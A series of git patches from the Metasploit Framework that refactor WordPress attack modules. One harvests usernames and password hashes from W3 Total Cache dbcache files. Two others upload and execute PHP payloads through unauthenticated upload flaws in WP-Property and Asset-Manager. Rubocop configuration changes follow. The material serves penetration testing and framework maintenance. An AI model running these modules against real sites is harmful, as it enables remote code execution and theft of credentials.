+    datastore['USER_ITERATIONS']
   end
 
   # Call the User site, so the db statement will be cached
   def cache_user_info(user_id)
-    user_url = normalize_uri(wordpress_url)
+    user_url = normalize_uri(target_uri)
     begin
       send_request_cgi(
-        {
-          "uri"      => user_url,
-          "method"   => "GET",
-          "vars_get" => {
-            "author" => user_id.to_s
-          }
-        })
+        'uri'      => user_url,
+        'method'   => 'GET',
+        'vars_get' => {
+          'author' => user_id.to_s
+        }
+      )
 
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      vprint_error("Unable to connect to #{url}")
-      return nil
+      vprint_error("Unable to connect to #{user_url}")
     rescue ::Timeout::Error, ::Errno::EPIPE
-      vprint_error("Unable to connect to #{url}")
-      return nil
+      vprint_error("Unable to connect to #{user_url}")
     end
+
+    nil
   end
 
   def run_host(ip)
-
     users_found = false
 
-    for site_id in 1..datastore["SITE_ITERATIONS"] do
+    (1..site_iterations).each do |site_id|
+
       vprint_status("Trying site_id #{site_id}...")
-      for user_id in 1..datastore["USER_ITERATIONS"] do
+
+      (1..user_iterations).each do |user_id|
+
         vprint_status("Trying user_id #{user_id}...")
+
         # used to cache the statement
         cache_user_info(user_id)
-        query="SELECT * FROM #{datastore["TABLE_PREFIX"]}users WHERE ID = '#{user_id}'"
+        query = "SELECT * FROM #{table_prefix}users WHERE ID = '#{user_id}'"
         query_md5 = ::Rex::Text.md5(query)
-        host = datastore["VHOST"] || ip
-        key="w3tc_#{host}_#{site_id}_sql_#{query_md5}"
+        host = datastore['VHOST'] || ip
+        key = "w3tc_#{host}_#{site_id}_sql_#{query_md5}"
         key_md5 = ::Rex::Text.md5(key)
-        hash_path = "/#{key_md5[0,1]}/#{key_md5[1,1]}/#{key_md5[2,1]}/#{key_md5}"
-        url = normalize_uri(wordpress_url, datastore["WP_CONTENT_DIR"], "/w3tc/dbcache")
-        url << hash_path
+        hash_path = normalize_uri(key_md5[0, 1], key_md5[1, 1], key_md5[2, 1], key_md5)
+        url = normalize_uri(wordpress_url_wp_content, 'w3tc', 'dbcache', hash_path)
 
         result = nil
         begin
-          result = send_request_cgi({ "uri" => url, "method" => "GET" })
+          result = send_request_cgi('uri' => url, 'method' => 'GET')
         rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
           print_error("Unable to connect to #{url}")
           break
@@ -103,8 +107,8 @@ class Metasploit3 < Msf::Auxiliary
           break
         end
 
-        if result.nil? or result.body.nil?
-          print_error("No response received")
+        if result.nil? || result.body.nil?
+          print_error('No response received')
           break
         end
 
@@ -113,18 +117,18 @@ class Metasploit3 < Msf::Auxiliary
           print_good("Username: #{match[0]}")
           print_good("Password Hash: #{match[1]}")
           report_auth_info(
-              :host   => rhost,
-              :port   => rport,
-              :sname  => ssl ? "https" : "http",
-              :user   => match[0],
-              :pass   => match[1],
-              :active => true,
-              :type   => "hash"
+              host: rhost,
+              port: rport,
+              sname: ssl ? 'https' : 'http',
+              user: match[0],
+              pass: match[1],
+              active: true,
+              type: 'hash'
           )
           users_found = true
         end
       end
     end
-    print_error("No users found :(") unless users_found
+    print_error('No users found :(') unless users_found
   end
 end

From e438c140ab028822ba6d70e244e02b00e6b02c8d Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer <FireFart@gmail.com>
Date: Tue, 29 Jul 2014 20:34:34 +0200
Subject: [PATCH 189/321] Updated wp_property_upload_exec module

---
 .../unix/webapp/wp_property_upload_exec.rb    | 76 +++++++------------
 1 file changed, 28 insertions(+), 48 deletions(-)

diff --git a/modules/exploits/unix/webapp/wp_property_upload_exec.rb b/modules/exploits/unix/webapp/wp_property_upload_exec.rb
index 0d576a5d8c..3a6d5d1f83 100644
--- a/modules/exploits/unix/webapp/wp_property_upload_exec.rb
+++ b/modules/exploits/unix/webapp/wp_property_upload_exec.rb
@@ -3,23 +3,23 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::PhpEXE
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
+    super(update_info(
+      info,
       'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
-      'Description'    => %q{
+      'Description'    => %q(
           This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
         plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
         temp directory without authentication, which results in arbitrary code execution.
-      },
+      ),
       'Author'         =>
         [
           'Sammy FORGIT',	# initial discovery
@@ -28,82 +28,62 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'OSVDB', '82656' ],
-          [ 'BID', '53787' ],
-          [ 'EDB', '18987'],
-          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
+          %w(OSVDB 82656),
+          %w(BID 53787),
+          %w(EDB 18987),
+          ['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html']
         ],
-      'Payload'	     =>
-        {
-          'BadChars' => "\x00",
-        },
       'Platform'       => 'php',
       'Arch'		     => ARCH_PHP,
-      'Targets'        =>
-        [
-          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
-          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
-        ],
+      'Targets'        => [['wp-property <= 1.35.0', {}]],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Mar 26 2012'))
-
-    register_options(
-      [
-        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
-      ], self.class)
   end
 
   def check
-    uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-property', 'third-party', 'uploadify', 'uploadify.php')
+    uri = normalize_uri(wordpress_url_plugins, 'wp-property', 'third-party', 'uploadify', 'uploadify.php')
 
-    res = send_request_cgi({
+    res = send_request_cgi(
       'method' => 'GET',
       'uri'    => uri
-    })
+    )
 
-    if not res or res.code != 200
-      return Exploit::CheckCode::Unknown
-    end
+    return Exploit::CheckCode::Unknown if res.nil? || res.code != 200
 
-    return Exploit::CheckCode::Appears
+    Exploit::CheckCode::Appears
   end
 
   def exploit
-    data_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-property', 'third-party', 'uploadify/')
+    data_uri = normalize_uri(wordpress_url_plugins, 'wp-property', 'third-party', 'uploadify/')
     request_uri = normalize_uri(data_uri, 'uploadify.php')
 
-    peer = "#{rhost}:#{rport}"
-
-    @payload_name = "#{rand_text_alpha(5)}.php"
-    php_payload = get_write_exec_payload(:unlink_self=>true)
+    payload_name = "#{rand_text_alpha(5)}.php"
 
     data = Rex::MIME::Message.new
-    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
+    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
     data.add_part(data_uri, nil, nil, "form-data; name=\"folder\"")
     post_data = data.to_s
 
-    print_status("#{peer} - Uploading payload #{@payload_name}")
-    res = send_request_cgi({
+    print_status("#{peer} - Uploading payload #{payload_name}")
+    res = send_request_cgi(
       'method' => 'POST',
       'uri'    => request_uri,
       'ctype'  => "multipart/form-data; boundary=#{data.bound}",
       'data'   => post_data
-    })
+    )
 
-    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
+    if res.nil? || res.code != 200 || res.body !~ /#{payload_name}/
       fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
     end
 
+    register_files_for_cleanup(payload_name)
+
     upload_uri = normalize_uri(res.body)
 
-    print_status("#{peer} - Executing payload #{@payload_name}")
-    res = send_request_raw({
+    print_status("#{peer} - Executing payload #{payload_name}")
+    send_request_raw(
       'uri'    => upload_uri,
       'method' => 'GET'
-    })
-
-    if res and res.code != 200
-        fail_with(Failure::UnexpectedReply, "#{peer} - Execution failed")
-    end
+    )
   end
 end

From 61ab88b2c5809fab5030cb8f2d22a715834c26ed Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer <FireFart@gmail.com>
Date: Tue, 29 Jul 2014 20:53:18 +0200
Subject: [PATCH 190/321] Updated wp_asset_manager_upload_exec module

---
 .../webapp/wp_asset_manager_upload_exec.rb    | 81 +++++++++----------
 1 file changed, 38 insertions(+), 43 deletions(-)

diff --git a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb
index 09f4f1396f..de3ce330a3 100644
--- a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb
+++ b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb
@@ -8,81 +8,76 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::PhpEXE
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
+    super(update_info(
+      info,
       'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
-      'Description'    => %q{
-        This module exploits a vulnerability found in Asset-Manager <= 2.0	WordPress
-        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
+      'Description'    => %q(
+        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
+        plugin. By abusing the upload.php file, a malicious user can upload a file to a
         temp directory without authentication, which results in arbitrary code execution.
-      },
+      ),
       'Author'         =>
         [
-          'Sammy FORGIT', # initial discovery
-          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
+          'Sammy FORGIT',                           # initial discovery
+          'James Fitts <fitts.james[at]gmail.com>'  # metasploit module
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'OSVDB', '82653' ],
-          [ 'BID', '53809' ],
-          [ 'EDB', '18993' ],
-          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html' ]
+          %w(OSVDB 82653),
+          %w(BID 53809),
+          %w(EDB 18993),
+          ['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html']
         ],
-      'Payload'	     =>
-        {
-          'BadChars' => "\x00",
-        },
       'Platform'       => 'php',
       'Arch'           => ARCH_PHP,
-      'Targets'        =>
-        [
-          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
-          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
-        ],
+      'Targets'        => [['asset-manager <= 2.0', {}]],
       'DefaultTarget' => 0,
       'DisclosureDate' => 'May 26 2012'))
+  end
 
-    register_options(
-      [
-        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
-      ], self.class)
+  def check
+    uri = normalize_uri(wordpress_url_plugins, 'asset-manager', 'upload.php')
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => uri
+    )
+
+    return Exploit::CheckCode::Unknown if res.nil? || res.code != 200
+
+    Exploit::CheckCode::Detected
   end
 
   def exploit
-    uri =  target_uri.path
-    uri << '/' if uri[-1,1] != '/'
-    peer = "#{rhost}:#{rport}"
     payload_name = "#{rand_text_alpha(5)}.php"
-    php_payload = get_write_exec_payload(:unlink_self=>true)
 
     data = Rex::MIME::Message.new
-    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
+    data.add_part(php_payload, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
     post_data = data.to_s
 
     print_status("#{peer} - Uploading payload #{payload_name}")
-    res = send_request_cgi({
+    res = send_request_cgi(
       'method'  => 'POST',
-      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
+      'uri'     => normalize_uri(wordpress_url_plugins, 'asset-manager', 'upload.php'),
       'ctype'   => "multipart/form-data; boundary=#{data.bound}",
       'data'    => post_data
-    })
+    )
 
-    if not res or res.code != 200 or res.body !~ /#{payload_name}/
+    if res.nil? || res.code != 200 || res.body !~ /#{payload_name}/
       fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
     end
 
-    print_status("#{peer} - Executing payload #{payload_name}")
-    res = send_request_raw({
-      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
-      'method'  => 'GET'
-    })
+    register_files_for_cleanup(payload_name)
 
-    if res and res.code != 200
-      fail_with(Failure::UnexpectedReply, "#{peer} - Execution failed")
-    end
+    print_status("#{peer} - Executing payload #{payload_name}")
+    send_request_raw(
+      'uri'     => normalize_uri(wordpress_url_wp_content, 'uploads', 'assets', 'temp', payload_name),
+      'method'  => 'GET'
+    )
   end
 end

From cc3285fa574484ef1ea93ce069db62323dc66f44 Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer <FireFart@gmail.com>
Date: Tue, 29 Jul 2014 20:53:54 +0200
Subject: [PATCH 191/321] Updated checkcode

---
 modules/exploits/unix/webapp/wp_property_upload_exec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/unix/webapp/wp_property_upload_exec.rb b/modules/exploits/unix/webapp/wp_property_upload_exec.rb
index 3a6d5d1f83..9f23d79abe 100644
--- a/modules/exploits/unix/webapp/wp_property_upload_exec.rb
+++ b/modules/exploits/unix/webapp/wp_property_upload_exec.rb
@@ -50,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     return Exploit::CheckCode::Unknown if res.nil? || res.code != 200
 
-    Exploit::CheckCode::Appears
+    Exploit::CheckCode::Detected
   end
 
   def exploit

From 75057b5df3f691970a56dd3971a9d439a2e0ad42 Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer <FireFart@gmail.com>
Date: Tue, 29 Jul 2014 21:02:15 +0200
Subject: [PATCH 192/321] Fixed variable

---
 modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb
index de3ce330a3..22a6305195 100644
--- a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb
+++ b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb
@@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
     payload_name = "#{rand_text_alpha(5)}.php"
 
     data = Rex::MIME::Message.new
-    data.add_part(php_payload, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
+    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
     post_data = data.to_s
 
     print_status("#{peer} - Uploading payload #{payload_name}")

From 4871492ec1abd169de8d9bc5a222bd0772070a12 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Tue, 29 Jul 2014 16:48:49 -0500
Subject: [PATCH 193/321] Tidy up .rubocopy.yml

This alphabetizes the configuration for rubocop.yml and preps for a
rubocop auto-config so we're not constantly hit with warnings.
---
 .rubocop.yml | 48 ++++++++++++++++++++++++++++++++++++------------
 1 file changed, 36 insertions(+), 12 deletions(-)

diff --git a/.rubocop.yml b/.rubocop.yml
index a8a443fbd5..95208da901 100644
--- a/.rubocop.yml
+++ b/.rubocop.yml
@@ -1,19 +1,43 @@
-LineLength:
+# This list was created by analyzing the last three months (51 modules)
+# committed to Metasploit Framework. Many, many older modules will have
+# offenses, but this should at least provide a baseline for new modules.
+#
+# Updates to this file should include a 'Description' parameter for
+# any explaination needed.
+
+# inherit_from: .rubocop_todo.yml
+
+Style/ClassLength:
+  Description: 'Most Metasploit modules are quite large. This is ok.'
+  Enabled: true
+  Exclude:
+    - 'modules/**/*'
+
+Style/Documentation:
+  Enabled: true
+  Description: 'Most Metasploit modules do not have class documentation.'
+  Exclude:
+    - 'modules/**/*'
+
+Style/Encoding:
+  Enabled: true
+  Description: 'We prefer binary to UTF-8.'
+  EnforcedStyle: 'when_needed'
+
+Style/LineLength:
+  Description: >-
+                  Metasploit modules often pattern match against very
+                  long strings when identifying targets.
   Enabled: true
   Max: 180
 
-MethodLength:
+Style/MethodLength:
   Enabled: true
-  Max: 100
-
-Style/ClassLength:
-  Exclude:
-    # Most modules are quite large and all contained in one class.  This is OK.
-    - 'modules/**/*'
+  Description: >-
+                  While the style guide suggests 10 lines, exploit definitions
+                  often exceed 200 lines.
+  Max: 300
 
 Style/NumericLiterals:
   Enabled: false
-
-Documentation:
-  Exclude:
-    - 'modules/**/*'
+  Description: 'This often hurts readability for exploit-ish code.'

From 1e47383118b601351ea5ec55c4c842d975729c69 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Tue, 29 Jul 2014 16:54:19 -0500
Subject: [PATCH 194/321] Add .rubocop_todo.yml

---
 .rubocop.yml      |   2 +-
 .rubocop_todo.yml | 741 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 742 insertions(+), 1 deletion(-)
 create mode 100644 .rubocop_todo.yml

diff --git a/.rubocop.yml b/.rubocop.yml
index 95208da901..cba7214ae9 100644
--- a/.rubocop.yml
+++ b/.rubocop.yml
@@ -5,7 +5,7 @@
 # Updates to this file should include a 'Description' parameter for
 # any explaination needed.
 
-# inherit_from: .rubocop_todo.yml
+inherit_from: .rubocop_todo.yml
 
 Style/ClassLength:
   Description: 'Most Metasploit modules are quite large. This is ok.'
diff --git a/.rubocop_todo.yml b/.rubocop_todo.yml
new file mode 100644
index 0000000000..ad14d34e6a
--- /dev/null
+++ b/.rubocop_todo.yml
@@ -0,0 +1,741 @@
+# This configuration was generated by `rubocop --auto-gen-config`
+# on 2014-07-29 16:18:04 -0500 using RuboCop version 0.23.0.
+# The point is for the user to remove these configuration records
+# one by one as the offenses are removed from the code base.
+# Note that changes in the inspected code, or installation of new
+# versions of RuboCop, may require this file to be generated again.
+
+# Offense count: 10
+Lint/AmbiguousOperator:
+  Enabled: false
+
+# Offense count: 8
+Lint/AmbiguousRegexpLiteral:
+  Enabled: false
+
+# Offense count: 1395
+# Configuration parameters: AllowSafeAssignment.
+Lint/AssignmentInCondition:
+  Enabled: false
+
+# Offense count: 105
+Lint/BlockAlignment:
+  Enabled: false
+
+# Offense count: 7
+Lint/ConditionPosition:
+  Enabled: false
+
+# Offense count: 119
+# Cop supports --auto-correct.
+Lint/DeprecatedClassMethods:
+  Enabled: false
+
+# Offense count: 5
+Lint/ElseLayout:
+  Enabled: false
+
+# Offense count: 1
+Lint/EmptyInterpolation:
+  Enabled: false
+
+# Offense count: 746
+# Configuration parameters: AlignWith, SupportedStyles.
+Lint/EndAlignment:
+  Enabled: false
+
+# Offense count: 3
+Lint/EnsureReturn:
+  Enabled: false
+
+# Offense count: 43
+Lint/Eval:
+  Enabled: false
+
+# Offense count: 586
+Lint/HandleExceptions:
+  Enabled: false
+
+# Offense count: 107
+Lint/LiteralInCondition:
+  Enabled: false
+
+# Offense count: 8
+Lint/LiteralInInterpolation:
+  Enabled: false
+
+# Offense count: 30
+Lint/Loop:
+  Enabled: false
+
+# Offense count: 51
+Lint/ParenthesesAsGroupedExpression:
+  Enabled: false
+
+# Offense count: 2
+Lint/RequireParentheses:
+  Enabled: false
+
+# Offense count: 526
+# Cop supports --auto-correct.
+Lint/RescueException:
+  Enabled: false
+
+# Offense count: 82
+Lint/ShadowingOuterLocalVariable:
+  Enabled: false
+
+# Offense count: 19
+Lint/SpaceBeforeFirstArg:
+  Enabled: false
+
+# Offense count: 395
+# Cop supports --auto-correct.
+Lint/StringConversionInInterpolation:
+  Enabled: false
+
+# Offense count: 83
+Lint/UnderscorePrefixedVariableName:
+  Enabled: false
+
+# Offense count: 18
+Lint/UnreachableCode:
+  Enabled: false
+
+# Offense count: 950
+# Cop supports --auto-correct.
+Lint/UnusedBlockArgument:
+  Enabled: false
+
+# Offense count: 1554
+# Cop supports --auto-correct.
+Lint/UnusedMethodArgument:
+  Enabled: false
+
+# Offense count: 21
+Lint/UselessAccessModifier:
+  Enabled: false
+
+# Offense count: 2236
+Lint/UselessAssignment:
+  Enabled: false
+
+# Offense count: 1
+Lint/UselessComparison:
+  Enabled: false
+
+# Offense count: 4
+Lint/UselessSetterCall:
+  Enabled: false
+
+# Offense count: 131
+Lint/Void:
+  Enabled: false
+
+# Offense count: 178
+# Cop supports --auto-correct.
+# Configuration parameters: EnforcedStyle, SupportedStyles.
+Style/AccessModifierIndentation:
+  Enabled: false
+
+# Offense count: 346
+Style/AccessorMethodName:
+  Enabled: false
+
+# Offense count: 195
+# Cop supports --auto-correct.
+Style/Alias:
+  Enabled: false
+
+# Offense count: 1007
+# Cop supports --auto-correct.
+Style/AlignArray:
+  Enabled: false
+
+# Offense count: 1205
+# Cop supports --auto-correct.
+# Configuration parameters: EnforcedHashRocketStyle, EnforcedColonStyle, EnforcedLastArgumentHashStyle, SupportedLastArgumentHashStyles.
+Style/AlignHash:
+  Enabled: false
+
+# Offense count: 2822
+# Cop supports --auto-correct.
+# Configuration parameters: EnforcedStyle, SupportedStyles.
+Style/AlignParameters:
+  Enabled: false
+
+# Offense count: 9507
+# Cop supports --auto-correct.
+Style/AndOr:
+  Enabled: false
+
+# Offense count: 9
+Style/AsciiComments:
+  Enabled: false
+
+# Offense count: 193
+# Cop supports --auto-correct.
+Style/BlockComments:
+  Enabled: false
+
+# Offense count: 841
+Style/BlockNesting:
+  Max: 8
+
+# Offense count: 3258
+# Cop supports --auto-correct.
+Style/Blocks:
+  Enabled: false
+
+# Offense count: 2245
+# Cop supports --auto-correct.
+# Configuration parameters: EnforcedStyle, SupportedStyles.
+Style/BracesAroundHashParameters:
+  Enabled: false
+
+# Offense count: 17
+Style/CaseEquality:
+  Enabled: false
+
+# Offense count: 1843
+# Configuration parameters: IndentWhenRelativeTo, SupportedStyles, IndentOneStep.
+Style/CaseIndentation:
+  Enabled: false
+
+# Offense count: 562
+# Cop supports --auto-correct.
+Style/CharacterLiteral:
+  Enabled: false
+
+# Offense count: 80
+Style/ClassAndModuleCamelCase:
+  Enabled: false
+
+# Offense count: 309
+# Configuration parameters: EnforcedStyle, SupportedStyles.
+Style/ClassAndModuleChildren:
+  Enabled: false
+
+# Offense count: 352
+# Configuration parameters: CountComments.
+Style/ClassLength:
+  Max: 38107
+
+# Offense count: 203
+# Cop supports --auto-correct.
+Style/ClassMethods:
+  Enabled: false
+
+# Offense count: 311
+Style/ClassVars:
+  Enabled: false
+
+# Offense count: 364
+# Cop supports --auto-correct.
+# Configuration parameters: PreferredMethods.
+Style/CollectionMethods:
+  Enabled: false
+
+# Offense count: 315
+# Cop supports --auto-correct.
+Style/ColonMethodCall:
+  Enabled: false
+
+# Offense count: 233
+# Configuration parameters: Keywords.
+Style/CommentAnnotation:
+  Enabled: false
+
+# Offense count: 375
+# Cop supports --auto-correct.
+Style/CommentIndentation:
+  Enabled: false
+
+# Offense count: 450
+Style/ConstantName:
+  Enabled: false
+
+# Offense count: 2713
+Style/CyclomaticComplexity:
+  Max: 259
+
+# Offense count: 275
+# Cop supports --auto-correct.
+Style/DefWithParentheses:
+  Enabled: false
+
+# Offense count: 159
+# Cop supports --auto-correct.
+Style/DeprecatedHashMethods:
+  Enabled: false
+
+# Offense count: 1455
+Style/Documentation:
+  Enabled: false
+
+# Offense count: 18
+# Configuration parameters: EnforcedStyle, SupportedStyles.
+Style/DotPosition:
+  Enabled: false
+
+# Offense count: 70
+Style/DoubleNegation:
+  Enabled: false
+
+# Offense count: 16
+Style/EachWithObject:
+  Enabled: false
+
+# Offense count: 490
+# Cop supports --auto-correct.
+# Configuration parameters: AllowAdjacentOneLineDefs.
+Style/EmptyLineBetweenDefs:
+  Enabled: false
+
+# Offense count: 3753
+# Cop supports --auto-correct.
+Style/EmptyLines:
+  Enabled: false
+
+# Offense count: 64
+Style/EmptyLinesAroundAccessModifier:
+  Enabled: false
+
+# Offense count: 8506
+# Cop supports --auto-correct.
+Style/EmptyLinesAroundBody:
+  Enabled: false
+
+# Offense count: 164
+# Cop supports --auto-correct.
+Style/EmptyLiteral:
+  Enabled: false
+
+# Offense count: 10
+# Configuration parameters: EnforcedStyle, SupportedStyles.
+Style/Encoding:
+  Enabled: false
+
+# Offense count: 1
+Style/EndBlock:
+  Enabled: false
+
+# Offense count: 1
+Style/EndOfLine:
+  Enabled: false
+
+# Offense count: 26
+Style/EvenOdd:
+  Enabled: false
+
+# Offense count: 44
+# Configuration parameters: Exclude.
+Style/FileName:
+  Enabled: false
+
+# Offense count: 108
+# Configuration parameters: EnforcedStyle, SupportedStyles.
+Style/For:
+  Enabled: false
+
+# Offense count: 981
+# Configuration parameters: EnforcedStyle, SupportedStyles.
+Style/FormatString:
+  Enabled: false
+
+# Offense count: 243
+# Configuration parameters: AllowedVariables.
+Style/GlobalVars:
+  Enabled: false
+
+# Offense count: 727
+# Configuration parameters: MinBodyLength.
+Style/GuardClause:
+  Enabled: false
+
+# Offense count: 11295
+# Cop supports --auto-correct.
+# Configuration parameters: EnforcedStyle, SupportedStyles.
+Style/HashSyntax:
+  Enabled: false
+
+# Offense count: 2551
+# Configuration parameters: MaxLineLength.
+Style/IfUnlessModifier:
+  Enabled: false
+
+# Offense count: 82
+Style/IfWithSemicolon:
+  Enabled: false
+
+# Offense count: 2056
+# Cop supports --auto-correct.
+Style/IndentArray:
+  Enabled: false
+
+# Offense count: 3023
+# Cop supports --auto-correct.
+# Configuration parameters: EnforcedStyle, SupportedStyles.
+Style/IndentHash:
+  Enabled: false
+
+# Offense count: 1257
+# Cop supports --auto-correct.
+Style/IndentationConsistency:
+  Enabled: false
+
+# Offense count: 4705
+# Cop supports --auto-correct.
+Style/IndentationWidth:
+  Enabled: false
+
+# Offense count: 302
+Style/Lambda:
+  Enabled: false
+
+# Offense count: 4664
+# Cop supports --auto-correct.
+Style/LeadingCommentSpace:
+  Enabled: false
+
+# Offense count: 3304
+# Cop supports --auto-correct.
+Style/LineEndConcatenation:
+  Enabled: false
+
+# Offense count: 127
+Style/LineLength:
+  Max: 5614
+
+# Offense count: 1480
+# Cop supports --auto-correct.
+Style/MethodCallParentheses:
+  Enabled: false
+
+# Offense count: 28
+# Cop supports --auto-correct.
+# Configuration parameters: EnforcedStyle, SupportedStyles.
+Style/MethodDefParentheses:
+  Enabled: false
+
+# Offense count: 22
+# Configuration parameters: CountComments.
+Style/MethodLength:
+  Max: 38090
+
+# Offense count: 278
+# Configuration parameters: EnforcedStyle, SupportedStyles.
+Style/MethodName:
+  Enabled: false
+
+# Offense count: 27
+Style/MultilineBlockChain:
+  Enabled: false
+
+# Offense count: 93
+Style/MultilineIfThen:
+  Enabled: false
+
+# Offense count: 19
+Style/MultilineTernaryOperator:
+  Enabled: false
+
+# Offense count: 3497
+# Cop supports --auto-correct.
+Style/NegatedIf:
+  Enabled: false
+
+# Offense count: 85
+# Cop supports --auto-correct.
+Style/NegatedWhile:
+  Enabled: false
+
+# Offense count: 53
+Style/NestedTernaryOperator:
+  Enabled: false
+
+# Offense count: 972
+# Configuration parameters: EnforcedStyle, SupportedStyles.
+Style/Next:
+  Enabled: false
+
+# Offense count: 587
+# Cop supports --auto-correct.
+Style/NilComparison:
+  Enabled: false
+
+# Offense count: 311
+# Cop supports --auto-correct.
+# Configuration parameters: IncludeSemanticChanges.
+Style/NonNilCheck:
+  Enabled: false
+
+# Offense count: 5052
+# Cop supports --auto-correct.
+Style/Not:
+  Enabled: false
+
+# Offense count: 72
+Style/OneLineConditional:
+  Enabled: false
+
+# Offense count: 28
+Style/OpMethod:
+  Enabled: false
+
+# Offense count: 94
+# Configuration parameters: CountKeywordArgs.
+Style/ParameterLists:
+  Max: 14
+
+# Offense count: 3567
+# Cop supports --auto-correct.
+# Configuration parameters: AllowSafeAssignment.
+Style/ParenthesesAroundCondition:
+  Enabled: false
+
+# Offense count: 2675
+# Cop supports --auto-correct.
+# Configuration parameters: PreferredDelimiters.
+Style/PercentLiteralDelimiters:
+  Enabled: false
+
+# Offense count: 1030
+# Cop supports --auto-correct.
+Style/PerlBackrefs:
+  Enabled: false
+
+# Offense count: 154
+# Configuration parameters: NamePrefixBlacklist.
+Style/PredicateName:
+  Enabled: false
+
+# Offense count: 165
+# Cop supports --auto-correct.
+Style/Proc:
+  Enabled: false
+
+# Offense count: 100
+# Configuration parameters: EnforcedStyle, SupportedStyles.
+Style/RaiseArgs:
+  Enabled: false
+
+# Offense count: 286
+# Cop supports --auto-correct.
+Style/RedundantBegin:
+  Enabled: false
+
+# Offense count: 269
+Style/RedundantException:
+  Enabled: false
+
+# Offense count: 3440
+# Cop supports --auto-correct.
+# Configuration parameters: AllowMultipleReturnValues.
+Style/RedundantReturn:
+  Enabled: false
+
+# Offense count: 3162
+# Cop supports --auto-correct.
+Style/RedundantSelf:
+  Enabled: false
+
+# Offense count: 237
+# Configuration parameters: MaxSlashes.
+Style/RegexpLiteral:
+  Enabled: false
+
+# Offense count: 349
+Style/RescueModifier:
+  Enabled: false
+
+# Offense count: 203
+Style/SelfAssignment:
+  Enabled: false
+
+# Offense count: 485
+# Cop supports --auto-correct.
+# Configuration parameters: AllowAsExpressionSeparator.
+Style/Semicolon:
+  Enabled: false
+
+# Offense count: 2468
+# Cop supports --auto-correct.
+# Configuration parameters: EnforcedStyle, SupportedStyles.
+Style/SignalException:
+  Enabled: false
+
+# Offense count: 126
+# Configuration parameters: Methods.
+Style/SingleLineBlockParams:
